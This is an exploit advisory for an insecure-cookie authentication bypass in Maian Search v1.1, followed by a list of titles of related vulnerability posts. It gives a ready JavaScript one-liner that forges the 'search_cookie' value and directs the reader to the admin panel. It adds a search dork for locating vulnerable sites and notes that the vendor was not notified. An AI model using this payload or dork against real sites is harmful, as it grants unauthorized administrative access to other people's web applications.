-[*] ================================================================================ [*]-
-[*] Maian Search <= v1.1 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by: Maian Search v1.1
[*] Vendor Has Not Been Notified!
[*] DESCRIPTION:
Maian Search suffers from a insecure cookie, the admin panel only checks if the cookie
exists.
and not the content. so we can easyily craft a cookie and look like a admin.
[*] Vulnerability:
javascript:document.cookie = "search_cookie=1; path=/";
[*] NOTE/TIP:
after running the javascript, visit "/admin/index.php" to view admin area.
-[*] ================================================================================ [*]-
-[*] Maian Search <= v1.1 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
【Maian Search】相关文章:
★ VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability
★ GeekLog
★ ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
★ pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability
★ Mole Group Last Minute Script
★ Maian Cart 1.1 Insecure Cookie Handling Vulnerability
★ fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit
★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit